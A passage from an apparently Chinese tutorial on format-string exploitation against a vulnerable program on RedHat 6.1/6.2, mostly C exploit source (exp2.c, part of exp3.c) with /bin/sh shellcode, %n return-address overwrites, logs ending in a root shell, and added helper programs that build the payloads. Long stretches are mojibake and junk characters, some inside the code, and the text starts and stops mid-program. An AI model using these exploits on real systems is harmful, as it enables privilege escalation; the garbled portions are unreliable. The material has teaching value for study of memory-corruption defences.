  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg, "EGG=", 4);
  env[0] = egg ;
  env[1] = (char *)0 ;

  execle("./vul1","vul1",buff,NULL,env);
}  /* end of main */

<- end ->

榪欓噷鍞竴鏀瑰彉鐨勫氨鏄痵hellcode鐨勫湴鍧鎸囧悜浜?jiǎn)Heap/BSS鍖猴紝瀹冮氬父鍦ㄥ唴瀛樺尯鍩熺殑浣庣錛?br />0x8000000浠ュ悗鐨勫湴鍧,榪欎釜鍦板潃灝嗗彲浠ヨ姝g‘鏄劇ず錛屽洜姝ゅ氨鍙互姝g‘鐨勮鐩杕ain()鐨?br />榪斿洖鍦板潃錛屽茍璺沖埌閭i噷鍘繪墽琛屾垜浠殑shellcode.榪欎釜鍦板潃鐨勮幏鍙栵紝涔熷彲浠ラ氳繃gdb璺熻釜
寰楀埌錛岃繖閲屼笉鍐嶈禈榪般?br />
[root@rh62 /root]# ./exp1 0xbffffadc 0x8049800
Usages: ./exp1 <RETloc> <SHELL_addr> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffadc
Using Shellcode address: 0x8049800

argv[1] = AA<4 raw RETloc bytes>%.10u%.10u%.10u%.10u%.134518728u%n
bash#
Very good, it worked! Note that it usually takes a few seconds before the # prompt appears, because
printing 0x8049800 characters takes a while. (Of course, the output does not appear on standard output.) :-)

<2> Attack method two: overwriting the return address in several passes (1)
====================================

The program above only succeeds on a system like RedHat 6.2; on RedHat 6.1 it cannot succeed, for the
reason mentioned earlier. Does that mean there is nothing to be done on RedHat 6.1? Not at all: with a
little thought we find that the characteristics of this vulnerable program itself make a successful attack
possible on RedHat 6.1 too. We saw that the vulnerable program vul.c prints and logs every argument the
user supplies, and the factor limiting our attack program is the printed length; so if we do not print
anything that long, snprintf() works normally:
AA|RETloc|%.10u%.10u%.10u%.10u%.(shell_addr-4*10-16)u|%n
The first thing that comes to mind is how to reduce the value of shell_addr. If we split one shell_addr into four parts:
shell_addr = (SH1 << 24) + (SH2 << 16) + (SH3 <<8) + SH4

渚嬪錛屽亣璁懼湪RETloc榪欎釜鍦板潃涓繚瀛樻湁榪斿洖鍦板潃0x44332211,鎴戜滑鎯沖皢榪欎釜0x44332211鎹㈡垚
瀛樻斁shellcode鐨勫湴鍧錛?xbffffcec,閭d箞鎴戜滑鎵瀵瑰簲鐨凷H1,SH2,SH3,SH4灝卞垎鍒槸錛?br />
SH1 = 0xbf
SH2 = 0xff
SH3 = 0xfc
SH4 = 0xec

What we have to do is write these four values in turn into RETloc, RETloc+1, RETloc+2 and RETloc+3, that is:

AA|RETloc  |%.10u%.10u%.10u%.10u%.(SH4-4*10-16)u|%n
AA|RETloc+1|%.10u%.10u%.10u%.10u%.(SH3-4*10-16)u|%n
AA|RETloc+2|%.10u%.10u%.10u%.10u%.(SH2-4*10-16)u|%n
AA|RETloc+3|%.10u%.10u%.10u%.10u%.(SH1-4*10-16)u|%n

Note: we are on an Intel x86 system, so the bytes are laid out in reverse (little-endian) order. The diagram below shows the state after each overwrite:

RETloc  RETloc+1 RETloc+2 RETloc+3
|0x11   | 0x22   | 0x33   |0x44|                       original contents:    0x44332211
|0xec   | 0x00   | 0x00   |0x00|                       1st overwrite (SH4):  0x000000ec
|0xec   | 0xfc   | 0x00   |0x00| 0x00|                 2nd overwrite (SH3):  0x0000fcec
|0xec   | 0xfc   | 0xff   |0x00| 0x00| 0x00|           3rd overwrite (SH2):  0x00fffcec
|0xec   | 0xfc   | 0xff   |0xbf| 0x00| 0x00| 0x00|     4th overwrite (SH1):  0xbffffcec

Be especially careful here: after these four overwrites, the memory just above the return address, where the function's arguments are kept (RETloc+4, RETloc+5, RETloc+6 and so on), has been zeroed, because each %n stores a full 4-byte value. If the function still needs those arguments after the overwrite, it may fail to return normally, particularly when it depends heavily on them.<br />
The other question is whether the program lets you overwrite four times in a row. If only one overwrite is possible, this still does not reach our goal. But our vulnerable program loops over main()'s arguments and calls the log() subroutine for each one, so supplying four command line arguments gives us four overwrites.<br />
<- begin ->  exp2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET                 500
#define DEFAULT_ALIGNMENT                2
#define DEFAULT_RETLOC          0xbffffa6c
#define DEFAULT_BUFFER_SIZE            128
#define DEFAULT_EGG_SIZE              1024
#define NOP                           0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff[4], *ptr, *egg;
  char *env[2];
  long shell_addr, retloc = DEFAULT_RETLOC, tmpaddr;
  int offset = DEFAULT_OFFSET, align = DEFAULT_ALIGNMENT;
  int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
  int i, j;

  if (argc > 1) sscanf(argv[1], "%lx", &retloc); /* RETloc from the command line */
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) align   = atoi(argv[3]);
  if (argc > 4) bsize   = atoi(argv[4]);
  if (argc > 5) eggsize = atoi(argv[5]);

  printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n", argv[0]);

  /* one format string per overwrite: argv[1]..argv[4] of the target */
  for (i = 0; i < 4; i++) {
    if (!(buff[i] = malloc(bsize))) {
      printf("Can't allocate memory.\n");
      exit(0);
    }
  }

  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  printf("Using RET location address: 0x%lx\n", retloc);
  shell_addr = get_esp() + offset;           /* where the shellcode will be */
  printf("Using Shellcode address: 0x%lx\n", shell_addr);

  for (j = 0; j < 4; j++) {
    ptr = buff[j];
    memset(ptr, 'A', 4);

    ptr += align;
    (*ptr++) =  retloc & 0x000000ff;          /* RETloc+j, little-endian */
    (*ptr++) = (retloc & 0x0000ff00) >> 8;
    (*ptr++) = (retloc & 0x00ff0000) >> 16;
    (*ptr++) = (retloc & 0xff000000) >> 24;

    retloc++; /* move one byte up so the next pass hits the next byte of the return address */
    for (i = 0; i < 4; i++) {
      memcpy(ptr, "%.10u", 5); /* walk the stack so that %n lands on the address above */
      ptr += 5;
    }
    tmpaddr = (shell_addr >> j*8) & 0xff;     /* SHj: the byte to write in this pass */
    if (tmpaddr > 56)                         /* n for the final %.nu: 4*10+16 chars are already printed */
      sprintf(ptr, "%%.%uu%%n", (unsigned)(tmpaddr - 56));
    else
      sprintf(ptr, "%%.%uu%%n", 1);
  }

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  egg[eggsize - 1] = '\0';
  memcpy(egg, "EGG=", 4);
  env[0] = egg ;
  env[1] = (char *)0 ;

  execle("./vul", "vul", buff[0], buff[1], buff[2], buff[3], NULL, env);
}  /* end of main */

<- end ->


[root@rh62 /root]# ./exp2
Usages: ./exp2 <RETloc> <offset> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffa6c
Using Shellcode address: 0xbffffcec

argv[1] = AAl\xfa\xff\xbf%.10u%.10u%.10u%.10u%.180u%n
argv[2] = AAm\xfa\xff\xbf%.10u%.10u%.10u%.10u%.196u%n
argv[3] = AAn\xfa\xff\xbf%.10u%.10u%.10u%.10u%.199u%n
argv[4] = AAo\xfa\xff\xbf%.10u%.10u%.10u%.10u%.135u%n
bash#

Note that exp2.c has a problem when it computes the final %.nu. If 0 < (tmpaddr - 56) < 10, the length printed by %.(tmpaddr-56)u may not equal (tmpaddr-56): a precision is only a minimum number of digits, so a stack word with more digits than that prints them all. Likewise, if tmpaddr <= 56 the address we write ends up off. Fortunately, because our shellcode sits in an environment variable, it lives near the top of the stack at an address like 0xbffff???, so only the lowest byte of the address can run into either case; and because the shellcode is preceded by a run of NOP instructions there is a whole range of addresses that will execute it, so we only have to choose a usable address within that range.<br />

This program has been verified on both RedHat 6.1 and RedHat 6.2.<br />
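The byte-by-byte technique of exp2.c, and the precision caveat just noted, can be checked without a vulnerable binary. The following C program is an added example and is not part of the original article or its exp2.c: it builds each pass's format string the way exp2.c does, lets a real snprintf() count the characters that precede %n, and applies the resulting 4-byte write to an 8-byte model of the stack slot at RETloc. The 10-character "argv[1] = " prefix is assumed from the logged output shown above (together with "AA" and the four address bytes it makes up the 16 in the article's 4*10+16), and the value each %u happens to consume is a parameter, because it depends on the real stack, which is not modelled here.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Characters the target has already emitted before the final "%.Nu" of an
   exp2-style string, using the article's accounting (4*10 + 16 = 56):
   "argv[1] = " as seen in the logged output (10, an assumption taken from
   that output), the two alignment bytes "AA" (2), the raw RETloc (4), and
   four "%.10u" conversions (40). */
#define LOG_PREFIX      10
#define FIXED_PREFIX    (LOG_PREFIX + 2 + 4)
#define WALK_CHARS      40
#define ALREADY_PRINTED (FIXED_PREFIX + WALK_CHARS)   /* 56 */

/* Build the format string for pass j (j = 0 writes the least significant
   byte, SH4 in the article's naming) exactly the way exp2.c does:
   "AA" + little-endian(RETloc + j) + "%.10u" x 4 + "%.Nu%n".
   Returns the precision N that exp2.c would pick. out needs >= 40 bytes. */
unsigned build_pass(char *out, uint32_t retloc, uint32_t shell_addr, int j)
{
    unsigned char sh = (shell_addr >> (8 * j)) & 0xff;
    unsigned prec = sh > ALREADY_PRINTED ? sh - ALREADY_PRINTED : 1;  /* exp2.c's rule */
    uint32_t loc = retloc + j;
    char *p = out;

    memcpy(p, "AA", 2);                       p += 2;
    for (int b = 0; b < 4; b++)               /* raw address bytes; 0xbffffa6c has no NUL */
        *p++ = (char)((loc >> (8 * b)) & 0xff);
    memcpy(p, "%.10u%.10u%.10u%.10u", 20);    p += 20;
    sprintf(p, "%%.%uu%%n", prec);            /* e.g. "%.180u%n" */
    return prec;
}

/* Characters the vulnerable snprintf() has emitted when it reaches %n if
   every %u conversion happens to consume a stack word equal to stack_word.
   snprintf(NULL, 0, ...) is used purely as a character counter. */
unsigned chars_before_n(unsigned prec, uint32_t stack_word)
{
    unsigned w = (unsigned)stack_word;
    int n = snprintf(NULL, 0, "%.10u%.10u%.10u%.10u%.*u", w, w, w, w, (int)prec, w);
    return FIXED_PREFIX + (unsigned)n;
}

/* Apply the four passes to an 8-byte model of memory starting at RETloc,
   initialised to the article's 0x44332211. Each %n stores a whole 4-byte
   int, so pass j clobbers mem[j..j+3]. Returns the 8 bytes as one
   little-endian 64-bit value: the low 32 bits are the new return address,
   the high 32 bits are what the writes spilled into RETloc+4..+7 (the
   zeroing of the function's arguments that the text warns about). */
uint64_t simulate_exp2(uint32_t retloc, uint32_t shell_addr, uint32_t stack_word)
{
    char fmt[48];
    unsigned char mem[8] = {0x11, 0x22, 0x33, 0x44, 0, 0, 0, 0};
    uint64_t packed = 0;

    for (int j = 0; j < 4; j++) {
        unsigned prec  = build_pass(fmt, retloc, shell_addr, j);
        unsigned count = chars_before_n(prec, stack_word);
        for (int b = 0; b < 4; b++)           /* the %n write at RETloc+j */
            mem[j + b] = (count >> (8 * b)) & 0xff;
    }
    for (int b = 7; b >= 0; b--)
        packed = (packed << 8) | mem[b];
    return packed;
}

int main(void)
{
    uint64_t r;

    /* the article's own numbers: RETloc 0xbffffa6c, shellcode at 0xbffffcec */
    r = simulate_exp2(0xbffffa6cu, 0xbffffcecu, 1u);
    printf("wanted 0xbffffcec, wrote 0x%08llx; RETloc+4..+7 now 0x%08llx\n",
           (unsigned long long)(r & 0xffffffffu), (unsigned long long)(r >> 32));

    /* the caveat: a low byte of 0x3c gives %.4u, but a 10-digit stack word such
       as 0xbffffa6c (3221223020) still prints all 10 digits, so the byte is off */
    r = simulate_exp2(0xbffffa6cu, 0xbffffc3cu, 0xbffffa6cu);
    printf("wanted 0xbffffc3c, wrote 0x%08llx (low byte off by %d)\n",
           (unsigned long long)(r & 0xffffffffu), (int)(r & 0xff) - 0x3c);
    return 0;
}
```

With the article's values every pass lands exactly (180, 196, 199 and 135 are the precisions the exp2 run above printed), and the spill into RETloc+4..+7 is all zeros as in the overwrite table. With a target whose low byte is 0x3c the first pass asks for %.4u, which cannot shorten a ten-digit value, so the low byte comes out as 0x42 instead; that is the case the NOP sled is there to absorb.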
<3> Attack method 3: overwriting the return address in several passes (2)
======================================

鏈夎鑰呭彲鑳戒細(xì)璇達(dá)紝榪欎釜紼嬪簭鐨勬垚鍔熶緷璧栦簬鎴戜滑鍙互榪炵畫(huà)榪涜鍥涙瑕嗙洊銆傚鏋滃彧緇欐垜浠竴嬈?br />鏈轟細(xì)錛屾槸涓嶆槸灝變笉琛屼簡(jiǎn)鍛?鍏跺疄錛岃繕鏈変竴縐嶆柟娉曞彲浠ュ畬鎴愭垜浠殑浠誨姟銆傚熀鏈濊礬涔熸槸鍒嗗洓嬈?br />鏉ヨ鐩栵紝鍙笉榪囬氳繃涓涓?printf()灝卞彲浠ュ畬鎴愪簡(jiǎn)錛岃冭檻涓嬪垪榪欑鎯呭喌錛?br />
聽(tīng) |AARET1|AAAARET2|AAAARET3|AAAARET4|%c...%c|%n1c%n|%n2c%n|%n3c%n|%n4c%n
聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |_________________|______|______|______|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |__________________________|______|______|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |___________________________________|______|聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |____________________________________________|

We use four %n conversions; each stores the number of characters printed so far into its corresponding address. If we adjust the number of %c conversions so that the first %n lands on RET1, the second on RET2, the third on RET3 and the fourth on RET4, we are halfway there. Naturally we set:
RET1 = RETloc
RET2 = RETloc + 1
RET3 = RETloc + 2
RET4 = RETloc + 3

n1 = SH4 - 1*4 - 12 - 4 - 8*3
(1*4 is what the four %c print, 12 is "AA" plus the "argv[.." text in front of it, 4 is the length of RET1, and 8*3 is the length of the three "AAAARET" groups that follow)
n2 = SH3 - SH4
n3 = SH2 - SH3
n4 = SH1 - SH2

Thus, when the first %n is reached the total number of characters printed is SH4; at the second %n it is SH3 (modulo 256), and so on.<br />
Note: since SH1 is usually 0xbf (for an address on the stack) and SH2 is usually 0xff, SH1 < SH2, so we add a large number, 0x0100, to SH1 to make it 0x01BF. During the fourth overwrite this turns RETloc+4 into 0x01, which usually does no great harm, while RETloc+3 is still correctly changed to 0xbf:

RETloc  RETloc+1 RETloc+2 RETloc+3
|0xec   | 0xfc   | 0xff   |0xbf| 0x01| 0x00| 0x00|     4th overwrite (SH1):  0xbffffcec

So we set n4 = 0x0100 + SH1 - SH2

Also, this program does not use the %.nu form but %nc, because %nc determines the printed length exactly: for any n > 0 exactly n characters are printed, which makes the calculation much more convenient. (Note that the %.nc form cannot be used; a precision is not defined for %c and does nothing here.) However, %nc pads with spaces, so if the application interprets spaces as separators this may cause problems.<br />
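The single-string variant, as an added example that is not the article's exp3.c: it derives n1..n4 with the rule above, including the 0x100 carry for the last byte, assembles the format string in the layout shown, and models the one snprintf() call to show the bytes that end up at RETloc and the 0x01 that spills into RETloc+4. The 10-character "argv[1] = " prefix is assumed from the logged output, the number of leading %c needed to reach RET1 is a parameter (4 in the article's formula), and the stack itself is not modelled.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define LOG_PREFIX 10   /* "argv[1] = ", as in the logged output (assumed from it) */

/* Width for one %Nc so that the running character count, taken modulo 256,
   becomes `want`. This is the article's n_k = SH_k - SH_(k+1) rule made
   modular: when the next byte is smaller than the current low byte (0xbf
   after 0xff) a full 0x100 is added, which is exactly the article's n4. */
unsigned pad_width(unsigned running, unsigned char want)
{
    unsigned n = (want + 256u - (running & 0xffu)) % 256u;
    return n ? n : 256u;   /* "%0c" would still print one char; wrap a whole byte instead */
}

/* Compute n1..n4 for shell_addr. `walk` is how many plain %c are needed to
   reach RET1 on the stack (4 in the article). Returns the count printed
   before the first %n1c, i.e. the article's 12 + 4 + 8*3 + walk. */
unsigned plan_widths(uint32_t shell_addr, int walk, unsigned widths[4])
{
    unsigned running = LOG_PREFIX + 2 + 4 + 8 * 3 + (unsigned)walk;
    unsigned start = running;
    for (int k = 0; k < 4; k++) {
        unsigned char sh = (shell_addr >> (8 * k)) & 0xff;  /* SH4, SH3, SH2, SH1 */
        widths[k] = pad_width(running, sh);
        running += widths[k];
    }
    return start;
}

/* Assemble the single format string in the article's layout:
   "AA"RET1 "AAAA"RET2 "AAAA"RET3 "AAAA"RET4 %c..%c %n1c%n %n2c%n %n3c%n %n4c%n
   Each "AAAA" is the stack word eaten by the %Nc that precedes the %n, so
   that the %n itself consumes the RET pointer after it. Returns the length;
   out needs >= 96 bytes. */
size_t build_payload(char *out, uint32_t retloc, uint32_t shell_addr, int walk)
{
    unsigned widths[4];
    char *p = out;

    plan_widths(shell_addr, walk, widths);
    for (int k = 0; k < 4; k++) {
        uint32_t loc = retloc + k;
        int pad = (k == 0) ? 2 : 4;           /* "AA" aligns RET1; "AAAA" fills a word */
        memset(p, 'A', (size_t)pad);          p += pad;
        for (int b = 0; b < 4; b++)           /* little-endian; 0xbffffabc has no NUL */
            *p++ = (char)((loc >> (8 * b)) & 0xff);
    }
    for (int i = 0; i < walk; i++) { memcpy(p, "%c", 2); p += 2; }
    for (int k = 0; k < 4; k++) p += sprintf(p, "%%%uc%%n", widths[k]);
    *p = '\0';
    return (size_t)(p - out);
}

/* Model the one snprintf(): every %Nc emits exactly N characters (checked
   here with a real snprintf) and every %n stores the running count as a
   4-byte int at RETloc+k. Returns the 8 bytes at RETloc as a little-endian
   64-bit value: the low 32 bits are the new return address, the high 32
   bits show what spilled into RETloc+4..+7. */
uint64_t simulate_exp3(uint32_t shell_addr, int walk)
{
    unsigned widths[4];
    unsigned running = plan_widths(shell_addr, walk, widths);
    unsigned char mem[8] = {0x11, 0x22, 0x33, 0x44, 0, 0, 0, 0};
    uint64_t packed = 0;

    for (int k = 0; k < 4; k++) {
        running += (unsigned)snprintf(NULL, 0, "%*c", (int)widths[k], 'x');
        for (int b = 0; b < 4; b++)           /* the k-th %n writes at RETloc+k */
            mem[k + b] = (running >> (8 * b)) & 0xff;
    }
    for (int b = 7; b >= 0; b--)
        packed = (packed << 8) | mem[b];
    return packed;
}

int main(void)
{
    char payload[96];
    unsigned widths[4];
    unsigned start = plan_widths(0xbffffcecu, 4, widths);
    uint64_t r = simulate_exp3(0xbffffcecu, 4);

    printf("printed before %%n1c: %u; n1..n4 = %u %u %u %u\n",
           start, widths[0], widths[1], widths[2], widths[3]);
    build_payload(payload, 0xbffffabcu, 0xbffffcecu, 4);
    printf("format tail: %s\n", payload + 6 + 24);   /* skip the raw address bytes */
    printf("RETloc now 0x%08llx, RETloc+4..+7 now 0x%08llx\n",
           (unsigned long long)(r & 0xffffffffu), (unsigned long long)(r >> 32));
    return 0;
}
```

For the article's 0xbffffcec the widths come out as 192, 16, 3 and 192: the last one is 0x100 + 0xbf - 0xff, and the running count ends at 0x1bf, which is why the table above shows 0x01 at RETloc+4.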
<- begin ->  exp3.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET                 550
#define DEFAULT_ALIGNMENT                2
#define DEFAULT_RETLOC          0xbffffabc
#define DEFAULT_BUFFER_SIZE            128
#define DEFAULT_EGG_SIZE              1024
#define NOP                           0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  char *env[2];
  long shell_addr, retloc = DEFAULT_RETLOC, tmpaddr;
  int offset = DEFAULT_OFFSET, align = DEFAULT_ALIGNMENT;
  int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
  int i, SH1, SH2, SH3, SH4, oldSH4;

  if (argc > 1) sscanf(argv[1], "%lx", &retloc); /* RETloc from the command line */
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) align   = atoi(argv[3]);
  if (argc > 4) bsize   = atoi(argv[4]);
  if (argc > 5) eggsize = atoi(argv[5]);

  printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n", argv[0]);

  if (!(buff = malloc(bsize))) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (!(egg = malloc(eggsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using RET location address: 0x%x\n", retloc);
聽(tīng) shell_addr = get_esp() + offset;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 璁$畻shellcocde鎵鍦ㄧ殑鍦板潃 */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using Shellcode address: 0x%x\n", shell_addr);
聽(tīng)
